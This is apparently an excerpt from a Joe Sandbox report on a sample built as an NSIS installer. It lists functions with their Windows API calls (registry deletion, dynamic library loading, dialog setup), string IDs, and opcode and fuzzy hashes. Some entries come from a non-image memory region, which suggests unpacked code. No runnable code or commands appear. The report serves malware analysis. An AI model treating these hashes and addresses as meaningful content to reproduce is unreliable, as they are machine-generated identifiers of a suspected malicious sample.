                                        • Opcode ID: f5d90bcb7ebd89fe1cd05b14302609a37f21c12a4aba64411c0a4f0db4ef4cc6
                                        • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                                        • Opcode Fuzzy Hash: f5d90bcb7ebd89fe1cd05b14302609a37f21c12a4aba64411c0a4f0db4ef4cc6
                                        • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9
                                        APIs
                                        • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,757B3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                        • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,757B3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                        • CharNextA.USER32(0000000C,?,757B3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                        • CharPrevA.USER32(0000000C,0000000C,757B3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: *?|<>/":
                                        • API String ID: 589700163-165019052
                                        • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                        • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                                        • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                        • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $q$$q$$q$$q$$q$$q
                                        • API String ID: 0-2069967915
                                        • Opcode ID: 4691617e68b7cfb8eb5ff644e0a313ff886ecb2d26d679abd6ffaaf106138ae5
                                        • Instruction ID: b5f67e8f6c7b25f2cb7448db4b0e67a57c2987b81ba742a55f943a14c8a661b6
                                        • Opcode Fuzzy Hash: 4691617e68b7cfb8eb5ff644e0a313ff886ecb2d26d679abd6ffaaf106138ae5
                                        • Instruction Fuzzy Hash: F7F12974A00204CFEB25DBA5C490B6EB7B3FF89351F648169D806AB365DB31EC42CB81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $q$$q$$q$$q$$q$$q
                                        • API String ID: 0-2069967915
                                        • Opcode ID: b283ee9c5eb015efdf9315411b27b10b50a30ce2ff52f95d14efa7c8b0283a07
                                        • Instruction ID: 31e211dbe3ae0136f1bd89469faa25c1a4fbea06b41d50db441d38241f85ba61
                                        • Opcode Fuzzy Hash: b283ee9c5eb015efdf9315411b27b10b50a30ce2ff52f95d14efa7c8b0283a07
                                        • Instruction Fuzzy Hash: 85718C70E04319CBEB68DFA8C8906ADBBB2EF85350F508429D805EB245DB75AD46CB81
                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,0040A430,00435800,00000000,00000000,00000031), ref: 004017BD
                                        • CompareFileTime.KERNEL32(-00000014,?,0040A430,0040A430,00000000,00000000,0040A430,00435800,00000000,00000000,00000031), ref: 004017E7
                                          • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000,?,757B23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,757B23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,757B23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID:
                                        • API String ID: 1941528284-0
                                        • Opcode ID: 1a1072c2038cbf95956adf311cc3bef911504581aab660e216232240bcca97c3
                                        • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                                        • Opcode Fuzzy Hash: 1a1072c2038cbf95956adf311cc3bef911504581aab660e216232240bcca97c3
                                        • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD
                                        APIs
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CloseEnum$DeleteValue
                                        • String ID:
                                        • API String ID: 1354259210-0
                                        • Opcode ID: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                        • Instruction ID: 6dce0a33df475c695949d28520f5422678f12aee2cc84e9e423a55bf09ef2c56
                                        • Opcode Fuzzy Hash: 31db4fe3a83ab3222004bb99c88de970b8ea6707b57bc237e5c93fbc2d64a622
                                        • Instruction Fuzzy Hash: 3B215C7250010CBBDF129F90CE89EEF7B6DEB44344F100076FA15B11A0E7B48F54AAA8
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00401DA3
                                        • GetClientRect.USER32(?,?), ref: 00401DF1
                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                        • DeleteObject.GDI32(00000000), ref: 00401E45
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                        • Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
                                        • Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                        • Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58
                                        APIs
                                        • GetDC.USER32(?), ref: 00401E5D
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                        • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                        • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        • Opcode ID: ccc424111de2d8fdc78d27f8554941ebead3544ddde10de4f69b2752e2115fa2
                                        • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                                        • Opcode Fuzzy Hash: ccc424111de2d8fdc78d27f8554941ebead3544ddde10de4f69b2752e2115fa2
                                        • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                                        APIs
                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                        • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                                        • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                        • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18
                                        APIs
                                        • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                        • wsprintfA.USER32 ref: 00404C1C
                                        • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 535e9ddcb49fc2af00bd827ff7e70f18c38bbd05e3bf044e223da0312c8e4865
                                        • Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
                                        • Opcode Fuzzy Hash: 535e9ddcb49fc2af00bd827ff7e70f18c38bbd05e3bf044e223da0312c8e4865
                                        • Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9
                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000,?,000000F0), ref: 004020F5
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(00429C68,00000000,?,757B23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,757B23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,757B23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        • LoadLibraryExA.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402105
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 0040217F
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2987980305-0
                                        • Opcode ID: d236e91e9817b245ae95546f76f8452ffb34461b05ce790c6aa1380878e74418
                                        • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                                        • Opcode Fuzzy Hash: d236e91e9817b245ae95546f76f8452ffb34461b05ce790c6aa1380878e74418
                                        • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E
                                        APIs
                                        • DestroyWindow.USER32(?,00000000,004030AB,?,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                                        • GetTickCount.KERNEL32 ref: 00402EFE
                                        • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                        • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                        • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                                        • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                        • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405E63
                                        • GetTempFileNameA.KERNEL32(0000000C,?,00000000,?,?,004033D6,00436000,00436400,00436400,00436400,00436400,00436400,00436400,004036B5,?,00000008), ref: 00405E7D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: nsa
                                        • API String ID: 1716503409-2209301699
                                        • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                        • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                                        • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                        • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $q$$q$$q$$q
                                        • API String ID: 0-4102054182
                                        • Opcode ID: 9c8bc70c0f2fbd2961de2bd8664f9a4db97a8cfe8d2b48233a1d60832f13ca51
                                        • Instruction ID: fbce30dc0c2240b745e06535d2793d981f5a4703ea3ac93fcb6d9d2182b901a9
                                        • Opcode Fuzzy Hash: 9c8bc70c0f2fbd2961de2bd8664f9a4db97a8cfe8d2b48233a1d60832f13ca51
                                        • Instruction Fuzzy Hash: E8B14B74A00218CBEF24DBA5C4907AEB7B2FF88314F648569D806EB355DB75DC82CB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LRq$LRq$$q$$q
                                        • API String ID: 0-2204215535
                                        • Opcode ID: 2b5f01de7f064f946a96feb941b6c500a6375d07634c51574b91266015e3a4d1
                                        • Instruction ID: 5eaf90873ed082379338ca475bb04115e293ee977ce95b03c120f9f9825a63a8
                                        • Opcode Fuzzy Hash: 2b5f01de7f064f946a96feb941b6c500a6375d07634c51574b91266015e3a4d1
                                        • Instruction Fuzzy Hash: 87518B74B00301CFEF28DB68C855B6A77F2EB89314F548569E9069B3A1DB31EC02CB51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91161049022.0000000037BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_37bb0000_004552024107.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $q$$q$$q$$q
                                        • API String ID: 0-4102054182
                                        • Opcode ID: 642aab4710ac0ff42c210f8be2f0bd04569eaaee073aaec48009fa3345bcfdd9
                                        • Instruction ID: 99c5c5b178f565a25f60d9e63555364b8795f9535cc263573de79ebb13c66e64
                                        • Opcode Fuzzy Hash: 642aab4710ac0ff42c210f8be2f0bd04569eaaee073aaec48009fa3345bcfdd9
                                        • Instruction Fuzzy Hash: 9C519374A00214CBFF25DBA8D8906ADB7B3EB89360F54856ADC05EB350DB34EC42DB81
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                                        • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.91136817932.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.91136776632.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136850340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136884804.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000002.00000002.91136919868.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                        • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                                        • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                        • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C